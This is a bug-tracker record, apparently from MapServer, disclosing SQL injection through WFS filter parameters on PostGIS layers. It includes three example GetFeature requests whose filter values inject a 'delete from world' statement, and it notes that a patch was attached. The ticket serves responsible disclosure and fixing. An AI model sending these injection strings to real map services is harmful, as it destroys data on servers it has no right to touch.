id,summary,reporter,owner,description,type,status,priority,milestone,component,version,severity,resolution,keywords,cc
3874,Multiple SQL injections possible on PostGIS layers with a WFS FE filter,rouault,assefa,"I've been able to trigger a SQL injection with svn trunk when running the following WFS GetFeature request :
{{{
http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world&
FILTER=name
')); delete from world; select (('
msGeometry
-90,-180 90,180
}}}
The 'delete from world' is run...
Also with the Literal of a PropertyIsLike :
{{{
http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS&
VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world&
FILTER=
name
')); delete from world; select name from world WHERE ((name LIKE '
msGeometry-90,-180 90,180
}}}
Also with the PropertyName :
{{{
map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature&
TYPENAME=world&FILTER=
name = 'a')); delete from world; select * from world where ((name
amsGeometry-90,-180 90,180
}}}
FLTGetIsBetweenComparisonSQLExpresssion() seems to be unaffected as far as the UpperBound and LowerBound are concerned because of the following check :
{{{
aszBounds = msStringSplit(psFilterNode->psRightNode->pszValue, ';', &nBounds);
if (nBounds != 2)
return NULL;
}}}
However there are perhaps more clever ways of exploiting it despite that.
The issue likely affects previous MS versions, and perhaps other backends, and perhaps other places in the code I haven't seen.
Attached a patch that fixes the issue, but it is not perfect. See comment in the patch.",defect,closed,normal,6.0.1 release,Security/Vulnerability (Private),svn-trunk (development),normal,fixed,,aboudreault assefa sdlime dmorissette pramsey colivier msmitherdc